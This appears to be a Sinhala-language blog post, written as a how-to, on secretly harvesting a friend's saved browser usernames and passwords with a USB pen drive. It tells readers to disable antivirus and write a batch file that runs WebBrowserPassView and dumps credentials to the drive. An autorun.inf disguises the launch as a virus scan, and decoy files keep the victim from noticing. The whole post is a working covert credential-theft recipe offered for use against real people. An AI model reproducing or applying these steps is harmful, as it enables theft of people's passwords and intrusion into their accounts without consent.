යාළුවගේ Online accounts වලට බඩු දෙන්න මෙන්න නියම බාන්ඩේ.




කොහොමද ඔන්න මන් මගේ අලුත් Blog එකේ මුල්ම post එක දාන්න යන්නේ. ඇත්තටම මේක ගැන කිවුවොත් මේකෙන් වෙන්නේ Web Browsers වල Save වෙලා තියෙන Usernames , Passwords ඔයාගේ pen එකට save කරගන්න විදිහේ වැඩක්. මේ software එක අපි අපේ pen එකට දාලා තව මොනවහරි files ටිකක් එක්ක යාලුවෙකුට දෙන එක. එතකොට එයා දන්නේ නැතුවම එයාගේ Web Browsers වල save වෙලා තියෙන Username, Passwords ඔයාගේ pen එකට එයාට හොරෙන් auto copy වෙනවා. මේක ගැන දන්නා අයත් ඇති. එත් දන්නේ නැති අයත් ඇතිනේ... එකයි දැම්මේ..

හරි එහෙනම් වැඩි කතා නැතුව අපි වැඩේට බහිමු..

ඔයාට මේක කරන්න අවශ්‍ය වෙනවා පහල තියෙන දේවල් ටික.

1. Computer / Laptop 
2. Pen  Drive 
3. Web Browser Pass View (Download)



හරි දැන් එහෙනම් ඔයා ඔය උඩ තියෙන Download කියන තැන click කරලා software එක download කරගන්න. හැබැයි මතක තියාගන්න. ඔය software එක Virus Guard එකෙන් අල්ලනවා. එක නිසා Virus Guard එක පැයකට වගේ off කරලාම මේ වැඩේ කරන්න පටන් ගන්න.

හරි දැන් ඔයාලා software එක download කරගන්න ඇති කියලා මන් හිතනවා. හරි දැන් අපිට කරන්න තියෙන්නේ අපේ pen drive  එකේ මේ software එක වැඩ කරන විදිහට හදා ගන්න එක. හරි දැන් අපි එක කරමු..

ඔයාල මුලින්ම ඔයාලගේ පෙන් එකේ ඔයාලට ඕන Files තියේනම් ඒවා ඔයාගේ computer එකට copy කරගන්න. ඒ මොකද කිවුවොත් අපි දැන් pen එක format කරන්න හදන්නේ.


හරි දැන් My computer එකට ගිහින් pen එක right click කරලා format කියන option එක click කරලා එකේ File system එක NTFS කරලා format කරන්න. pen එළෙ file system එක NTFS කරන එක අනිවාර්යයි හොදේ. නැත්තන් අපේ වැඩේ හරියන්නේ නෑ.  

හරි එහෙනම් Pen එක format කරගත්තට පස්සේ කරන්න තියෙන්නේ. පෙන් එකේ USB කියල File එකක් හදාගෙන, ඔය download කරගත්ත software එක එකට Extract කරගන්න එක. ඔයා එක Extract කරගත්තට පස්සේ තව පොඩි වැඩ ටිකක් තියෙයි අපේ වැඩේ හරියන විදිහට හදන්න.. 

හරි ඒ පොඩි වැඩ ටික තමයි, ඔයා notpad එක ඔපෙන් කරගන්න. ඊට පස්සේ ඔය මෙන්න මේ පහල තියෙන codes ටික notepad එකට copy කරගන්න.


@echo off
cls
start \usb\WebBrowserPassView.exe /shtml 1.html


හරි දැන් කරන්න තියෙන්නේ ඒ Notepad එක save කරගන්න එක. ඒක පෙන් එකට save කරගන්න (folder එකකට නෙමෙයි නිකන් save කරන්න).  තියාගන්න එක save කරනකොට එකට දෙන්න ඕන නම තමයි  USB Driver.bat කින එක. එක අනිවාර්යයෙන්ම මතක තියාගන්න. නැත්තන් අපේ වැඩේ හරියන්නේ නෑ . 


හරි දැන් තව දෙයක් කරන්න තියෙයි. ඒ තමයි  අයෙත් අලුත් notepad එකක් Open කරගෙන එකට මෙන්න මේ පහල තියෙන code එක copy කරගන්න එක.

 [autorun]
open=usbdriver.bat
Action=Perform a virus Scan

හරි දැන් මේ notepad document එකත් අපි සවේ කරගන්න ඕනේ අපේ pen එකට. එක save  කරනකොට එකේ Name එක විදිහට Autorun.inf කියන එක දීලා pen එකට save කරගන්න. 

ඔන්න දැන් අපේ වැඩේ හරි. එහෙනම් පෙන් එක යාලුවෙක්ට දීලම බලන්න. පෙන් එකට වෙන files ටිකකුත් දාලම දෙන්න නැත්තන් අපේ වැඩේ මාට්ටු වෙනවා.

ඔයාට අපහු ඔයාගේ යාලුවගෙන් pen එක හම්බුනට පස්සේ  ඔයාගේ  Pen එකේ තියෙන USB file එකේ ඇති WebBrowserPassView.exe ඔන්න ඔහොම application එකක්. අන්න එකේ ඇති ඔයාගේ යාළුවගේ passwords ඔක්කොම.(එයා web browser එකේ passwords save කරලා තියේනම් විතරයි හොදේ)

ඔන්න එහෙනම් අපි ගියා... ආයෙත් ඉක්මනට එන්නම් හොද post එකක් අරගෙන...
post එක හොදනම් පහලින් comment කරගෙන යන්න... මේ blog එක තාම අලුත් නිසා මේ බ්ලොග් එක ප්‍රසිද්ද කරන්න ඔයාලගෙන් සහය පතනවා. ඔයාලා මේ බ්ලොග් එක ඔයාලගේ යාලුවන්ටත් share කරන්න. එතකොට අපි තව හොද හොද post දෙන්නම්.



No comments:

Powered by Blogger.